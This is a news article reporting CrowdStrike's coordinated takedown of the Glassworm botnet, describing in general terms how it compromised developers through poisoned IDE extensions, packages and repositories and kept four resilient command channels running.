CrowdStrike Dismantles Developer-Targeting Glassworm Botnet

In a year where software supply chain attacks dominated the cyber news cycle, the strategic takedown of the Glassworm botnet is welcome news for developers everywhere. 

Through a combined operation with Google and the Shadowserver Foundation, cybersecurity giant CrowdStrike successfully dismantled a sophisticated global botnet designed to withstand traditional takedown efforts. 

The effort led by CrowdStrike’s Counter Adversary Operations team targeted an advanced malware infrastructure that used four separate command and control channels to remain active even if parts of the network were disabled.

What is the Glassworm botnet? 

From early in 2025, Glassworm operators had been systematically targeting their prey of choice – developers, high value targets with access to source code repos, cloud, CI/CD pipelines and package registries.

A good target choice, as a single developer compromise could soon snowball into vast supply chain compromises impacting thousands of users and enterprises downstream. 

The tools in the attacker quiver were multi-pronged. 

Torajanised VSCode extensions were published on the OpenVSX marketplace hiding under the guise of popular tools like time trackers and code formatters. 

It wasn’t just devs using VSCode that were targeted with these, instead users of Cursor, Positron, Windsurf, VSCodium and many other IDEs could also fall victim to these. 

Another weapon of choice was compromised npm and Python packages that could introduce malicious code “through postinstall hooks and setup scripts – executing silently during routine dependency installation”.

Poisoned GitHub repositories added to the campaign, with credentials harvested from earlier Glassworm infections used to force-push and poison over 300 repos. 

A fullblown Node.js remote access tool called GlasswormRAT was also uncovered in this cross-platform operation that left no OS unturned – with Windows, macOS and Linux all affected. 

CrowdStrike has reason to believe that the criminals behind this operation are likely based in Russia. 

Persistent malware infrastructure

Built for resilience, the cybercriminal infrastructure adopted decentralised technologies to make malware operations harder to detect and therefore dismantle.

The botnet had been engineered for persistence, relying on multiple communication methods that allowed infected devices to continue receiving instructions even if one system failed.

The botnet’s C2 server addresses were encoded in the memo fields of Solana’s blockchain transactions, thereby creating “an immutable, publicly accessible dead-drop that cannot be taken offline through conventional means,” as CrowdStrike puts it. 

BitTorrent, a distributed file sharing system that allows people to share files across the internet was also leveraged by threat actors, with the GlasswormRAT querying the BitTorrent Distributed Hash Table (DHT) for hardcoded public keys. 

The botnet also relied on Google Calendar events and commercial virtual servers to distribute instructions and payloads to infected machines. 

CrowdStrike calls this “a dynamic front protecting the actual C2 servers behind multiple layers of indirection”.

The Takedown

CrowdStrike notes that disrupting a botnet of this sophisticated architecture “required precision and timing”.

“Taking down only one channel would have left the others operational, allowing the operators to quickly reconstitute. All four channels had to be disrupted simultaneously in a coordinated effort,” CrowdStrike says. 

Alessandro Guggino, Senior Security Researcher at CrowdStrike, adds: “CrowdStrike played offense and brought the fight to the adversary.

“The Counter Adversary Operations team disrupted a global botnet built for resilience, engineered with four distinct command and control (C2) channels to be nearly impossible to take down.

“The C2 architecture relied on two decentralised networks that were taken over and eclipsed - the Solana blockchain and the BitTorrent distributed hash table (DHT) – as well as Google Calendar events and commercial virtual servers, taken down by our operation partners.

“As a result, infected machines can no longer receive new instructions or payloads.”

For enterprises, the incident serves as another reminder that modern cybersecurity requires proactive threat hunting, collaborative intelligence sharing and tactical disruption.  

Traditional security efforts that focus only on detection may struggle against adversaries using decentralised infrastructure and layered command systems.

CrowdStrike’s latest operation demonstrates how offensive cybersecurity measures are becoming a more visible part of the industry’s strategy as defenders are increasingly working together to dismantle the infrastructure that powers organised cybercrime.